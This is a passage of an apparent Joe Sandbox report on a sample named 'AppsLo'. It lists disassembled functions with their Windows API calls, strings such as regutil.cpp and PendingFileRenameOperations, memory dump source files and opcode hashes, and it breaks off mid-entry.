Function 008D88B2 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008D8A56,00000000,00000000,?,008D8859,008D8A56,00000000,00000000,00000000,?,008D8A56,00000006,FlsSetValue), ref: 008D88E4
GetLastError.KERNEL32(?,008D8859,008D8A56,00000000,00000000,00000000,?,008D8A56,00000006,FlsSetValue,00902404,0090240C,00000000,00000364,?,008D6230), ref: 008D88F0
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008D8859,008D8A56,00000000,00000000,00000000,?,008D8A56,00000006,FlsSetValue,00902404,0090240C,00000000), ref: 008D88FE

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 68efdd1e91d9548931f5ccf1e92cf6179e9981ce1a6baa2ee1377a3ef851d823
Instruction ID: b7a95a396dd3170325a8c17b8a36033dc34a95d87ccb86959144413050ec242e
Opcode Fuzzy Hash: 68efdd1e91d9548931f5ccf1e92cf6179e9981ce1a6baa2ee1377a3ef851d823
Instruction Fuzzy Hash: 3501F732655227FBCB214A699C94A6B7B98FF05BA1B100721F946EB340DB20DC0087E0

Function 008D615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,008D1AEC,00000000,80004004,?,008D1DF0,00000000,80004004,00000000,00000000), ref: 008D6162
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008D61CA
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008D61D6
_abort.LIBCMT ref: 008D61DC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 7389a435f631cf17615b3b43c3833c363affcf649a1fda7de1ad803a7f522e40
Instruction ID: 0123aaf9a8b092e1b77ae19f77394964cb64de47905f6f76b3813dcaa93358a5
Opcode Fuzzy Hash: 7389a435f631cf17615b3b43c3833c363affcf649a1fda7de1ad803a7f522e40
Instruction Fuzzy Hash: 99F08135108B1AA6CA1237396C0AB2F3769FFC2771B250317F924E6396FF6088125166

Function 008A7435 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 008A7441
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008A74A8

Strings

Failed to get value of variable: %ls, xrefs: 008A747B
Failed to get value as numeric for variable: %ls, xrefs: 008A7497

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-4270472870
Opcode ID: 5fa01aa33d3d2fb04bb6652fb6949f939e1e71601e974d1809b3d1cc9c2d2021
Instruction ID: 236cf6e0ed0b1c9c0f1a10242306d29f0921f4cc74a0279e885085bfacc11125
Opcode Fuzzy Hash: 5fa01aa33d3d2fb04bb6652fb6949f939e1e71601e974d1809b3d1cc9c2d2021
Instruction Fuzzy Hash: E701D43290A129FBEF125F54CC05A9E7F64FF06720F008124FC04EA621C3369E10ABD9

Function 008A75AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 008A75B6
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008A761D

Strings

Failed to get value as version for variable: %ls, xrefs: 008A760C
Failed to get value of variable: %ls, xrefs: 008A75F0

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-1851729331
Opcode ID: 73974ce699c91c4bab68e14c3f5385ba66297a2a3273b462bdcfbd3da655877d
Instruction ID: 335f203eab165868d80aa53976d14d226320fe1e9c8a815b7c8313868226a0cf
Opcode Fuzzy Hash: 73974ce699c91c4bab68e14c3f5385ba66297a2a3273b462bdcfbd3da655877d
Instruction Fuzzy Hash: C3018832D0452ABBDF125E88CC09B9E3A64FF22724F004120FD04EA621D33A9E10AAD5

Function 008A7539 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,008A9897,00000000,?,00000000,00000000,00000000,?,008A96D6,00000000,?,00000000,00000000), ref: 008A7545
LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,008A9897,00000000,?,00000000,00000000,00000000,?,008A96D6,00000000,?,00000000), ref: 008A759B

Strings

Failed to get value of variable: %ls, xrefs: 008A756B
Failed to copy value of variable: %ls, xrefs: 008A758A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2936390398
Opcode ID: 94255f52aa7de5d32c330e5da8aa4660b4a3bc3814dbc6b64f9abf9012abdd05
Instruction ID: 0b18359a2eddf4215b5480591ed8eb2306c32880c851047ae56386dde61d32b3
Opcode Fuzzy Hash: 94255f52aa7de5d32c330e5da8aa4660b4a3bc3814dbc6b64f9abf9012abdd05
Instruction Fuzzy Hash: 25F08C32D40269BBDF126F94CC09E9E3B68FF06361F008120FD14EA220C3369E20ABD4

Function 008CE776 Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008CE788
GetCurrentThreadId.KERNEL32 ref: 008CE797
GetCurrentProcessId.KERNEL32 ref: 008CE7A0
QueryPerformanceCounter.KERNEL32(?), ref: 008CE7AD

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: f944ee7c3efde41b7536dfe7c588cbb6e1e325366d4eeebb2bd1a10d04d1d11b
Instruction ID: d796274e2684eaba07ad3b4764d6570ca570f153ab8ae2b902f026e17cea9136
Opcode Fuzzy Hash: f944ee7c3efde41b7536dfe7c588cbb6e1e325366d4eeebb2bd1a10d04d1d11b
Instruction Fuzzy Hash: CFF04D71C1024DEBCB00DBB4D989A9EBBF8FF18315F514899A415EB210E734AB049B61

Function 008E0C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 008E0DD7

Strings

regutil.cpp, xrefs: 008E0DC4

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Close
String ID: regutil.cpp
API String ID: 3535843008-955085611
Opcode ID: 23e008eb0e2c189a3e29258dab76d0056b2f85e3376d6b68b8e2f3745a14d800
Instruction ID: df58a41ea0f4e1dfe649044a73eeeae6b4a3d6b4e5fc6345779f8fd536e1d6ab
Opcode Fuzzy Hash: 23e008eb0e2c189a3e29258dab76d0056b2f85e3376d6b68b8e2f3745a14d800
Instruction Fuzzy Hash: 9A41D432E011A9FBDB318ADACC047AE7665FB42720F258B24B814EA150D7B59DD0AFD1

Function 008E479B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 008E48FC

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 008E47AC
PendingFileRenameOperations, xrefs: 008E47EC, 008E48D4

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-3023217399
Opcode ID: 815c1d00be1564148d1441f665f75e7192e6d044ff384420305bf42ba0abdc03
Instruction ID: 40feb9cefb6cb14d7b277fc93cf0aa293f0de56d69b1afa0f87c1da5fe56c0a4
Opcode Fuzzy Hash: 815c1d00be1564148d1441f665f75e7192e6d044ff384420305bf42ba0abdc03
Instruction Fuzzy Hash: 01416D75E001A9EFCF20DF9AC881AAEBBB5FB46B10F215079E508E7251D7319E50DB50

Function 008E10B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008E112B
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008E1163

Strings

regutil.cpp, xrefs: 008E11A9

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: ead48dcd074ec0ab37bb3d9d8d5e6c100f318030252f9d2edff95a0d4dc608b2
Instruction ID: 905cfcfc776872aa04bcd43300da759b22577f910fc93494e97c5085cda6c805
Opcode Fuzzy Hash: ead48dcd074ec0ab37bb3d9d8d5e6c100f318030252f9d2edff95a0d4dc608b2
Instruction Fuzzy Hash: 43418072D001AAFBDF209F9ACC499AEBBB9FF46350F104169FA11E7250D7319E109B90

Function 008D66D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(008EB518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 008D67A3
GetLastError.KERNEL32 ref: 008D67BF

Strings

comres.dll, xrefs: 008D674A, 008D6798, 008D67D4

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: comres.dll
API String ID: 203985260-246242247
Opcode ID: c9457f4416c8604e01ab825bdf010b5830f7225397ea56523ded378c22694e4f
Instruction ID: fc40dcb9e650192dd3add0d1e2d90ae4b28f72c5cde63ce689f94d4fc0345392
Opcode Fuzzy Hash: c9457f4416c8604e01ab825bdf010b5830f7225397ea56523ded378c22694e4f
Instruction Fuzzy Hash: 6B31903560025DABCB21AE59C885AAB7B68FF51768F14036AF914CA391FB70CD14C7A2

Function 008E8F7A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E8E44: lstrlenW.KERNEL32(00000100,?,?,?,008E9217,000002C0,00000100,00000100,00000100,?,?,?,008C7D87,?,?,000001BC), ref: 008E8E69

RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008EB500,wininet.dll,?), ref: 008E907A
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008EB500,wininet.dll,?), ref: 008E9087

Part of subcall function 008E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

Part of subcall function 008E0E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,008C8E1B), ref: 008E0EAA
Part of subcall function 008E0E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,008C8E1B,00000000), ref: 008E0EC8

Strings

wininet.dll, xrefs: 008E8FEF, 008E903C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Close$EnumInfoOpenQuerylstrlen
String ID: wininet.dll
API String ID: 2680864210-3354682871
Opcode ID: e46ecad20c671a72a524be9092b2c865ceb453e05d952ae027e37d173c9ba164
Instruction ID: 8f7b5c0ea8fc35712b966c96564a99a00b52792c7c3c8b2cdbc5e24632bd4127
Opcode Fuzzy Hash: e46ecad20c671a72a524be9092b2c865ceb453e05d952ae027e37d173c9ba164
Instruction Fuzzy Hash: 54315A32C015AAEFCF21AFDACD408AEBB79FF45310B914179EA54B6121C7718E50DB91

Function 008E939E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E8E44: lstrlenW.KERNEL32(00000100,?,?,?,008E9217,000002C0,00000100,00000100,00000100,?,?,?,008C7D87,?,?,000001BC), ref: 008E8E69

RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008E9483
RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008E949D

Part of subcall function 008E0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,008B061A,?,00000000,00020006), ref: 008E0C0E

Part of subcall function 008E14F4: RegSetValueExW.ADVAPI32(00020006,008F0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,008AF335,00000000,?,00020006), ref: 008E1527

Part of subcall function 008E14F4: RegDeleteValueW.ADVAPI32(00020006,008F0D10,00000000,?,?,008AF335,00000000,?,00020006,?,008F0D10,00020006,00000000,?,?,?), ref: 008E1557

Part of subcall function 008E14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,008AF28D,008F0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008E14BB

Strings

%ls\%ls, xrefs: 008E93FF

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Value$Close$CreateDeletelstrlen
String ID: %ls\%ls
API String ID: 3924016894-2125769799
Opcode ID: 0fabd173dcf2ed27dbf9f4bc289e5f6bc6d247c292370fd33a7c5f526761c2c9
Instruction ID: 0e23e3c0f2d66d32a3a214d3dff3a6e977722de12856a8e0ed180b2a9786fbfd
Opcode Fuzzy Hash: 0fabd173dcf2ed27dbf9f4bc289e5f6bc6d247c292370fd33a7c5f526761c2c9
Instruction Fuzzy Hash: B4311A72C011AEBFCF229F96CC4189EBBB9FB05314B014166F944B6221D7718E11EB95

Function 008A3A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 008A3AB0

Strings

wininet.dll, xrefs: 008A3A6E
crypt32.dll, xrefs: 008A3A6D, 008A3AAC, 008A3AAE

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: _memcpy_s
String ID: crypt32.dll$wininet.dll
API String ID: 2001391462-82500532
Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction ID: aa3f30745b4aff18030d9c58e0b869c39a08aad70136dc656ff6a1f3c365f6ab
Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
Instruction Fuzzy Hash: 1A115E71700229ABDB08DE19CD859AFBF69EF95294B14802AFD058B751D271EA10CAE0

Function 008E14F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00020006,008F0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,008AF335,00000000,?,00020006), ref: 008E1527
RegDeleteValueW.ADVAPI32(00020006,008F0D10,00000000,?,?,008AF335,00000000,?,00020006,?,008F0D10,00020006,00000000,?,?,?), ref: 008E1557

Strings

regutil.cpp, xrefs: 008E158B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Value$Delete
String ID: regutil.cpp
API String ID: 1738766685-955085611
Opcode ID: 6d164b920ea7895c7aa90da7ec251f7b8441a921bcc458583357312f80d43863
Instruction ID: 7c50545b7a9c24b16e409d40fc0f2ce230cb553314981fb2a72b901bcbc131d2
Opcode Fuzzy Hash: 6d164b920ea7895c7aa90da7ec251f7b8441a921bcc458583357312f80d43863
Instruction Fuzzy Hash: C6110636D112BABBDF214A968C0DBAA7A24FB46770F110225FD12EA190DB31CD2097E0

Function 008ADDB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,008C7691,00000000,IGNOREDEPENDENCIES,00000000,?,008EB518), ref: 008ADE04

Strings

IGNOREDEPENDENCIES, xrefs: 008ADDBB
Failed to copy the property value., xrefs: 008ADE38

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareString
String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
API String ID: 1825529933-1412343224
Opcode ID: 4f4da6db74640d41b6714a2e329fa2d1fabc114525e8b8305556d8cbfe3e6445
Instruction ID: 6c23c6e565bcfc8f4d03cd252c3d309d1dfd60d042595bb1edbbc7239b0a21b8
Opcode Fuzzy Hash: 4f4da6db74640d41b6714a2e329fa2d1fabc114525e8b8305556d8cbfe3e6445
Instruction Fuzzy Hash: 6F11A332200315AFEB115F58DC84FAA77A6FF56324F254175FA1ADFA92C771A860CA80

Function 008E563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,008B8E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 008E566E
SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,008B8E97,?), ref: 008E5689

Strings

aclutil.cpp, xrefs: 008E56AD

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: InfoNamedSecuritySleep
String ID: aclutil.cpp
API String ID: 2352087905-2159165307
Opcode ID: 02990cc809f187542b512bb03fd5d1315241d25335927f962b47f20364464f14
Instruction ID: b468be1bf3c9a6b1a85ef9f9188908c30db79428b7555497f3ea9dff9e76dc2e
Opcode Fuzzy Hash: 02990cc809f187542b512bb03fd5d1315241d25335927f962b47f20364464f14
Instruction Fuzzy Hash: 50015E33801569BBCF229F8ACD05E9E7B65FF95768F060155BD14AA130C6329D209BD0

Function 008A158C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(0000007F,00000000,00000000,008B70E8,00000000,008B70E8,00000000,00000000,008B70E8,00000000,00000000,00000000,?,008A2318,00000000,00000000), ref: 008A15D0
GetLastError.KERNEL32(?,008A2318,00000000,00000000,008B70E8,00000200,?,008E52B2,00000000,008B70E8,00000000,008B70E8,00000000,00000000,00000000), ref: 008A15DA

Strings

strutil.cpp, xrefs: 008A15FE

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: 4bd4a83fc96d72153355b2de3a07de7a65e13998d580debb02095ab38a085d4b
Instruction ID: d524bdbac921594ed6210fe12db8e4bbeae4336af06f8c2a940c52ee026a6453
Opcode Fuzzy Hash: 4bd4a83fc96d72153355b2de3a07de7a65e13998d580debb02095ab38a085d4b
Instruction Fuzzy Hash: E801923394167667DF218A998C48E5B7A68FF86B71F094224FE10EF650D660DC1087E1

Function 008B57BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

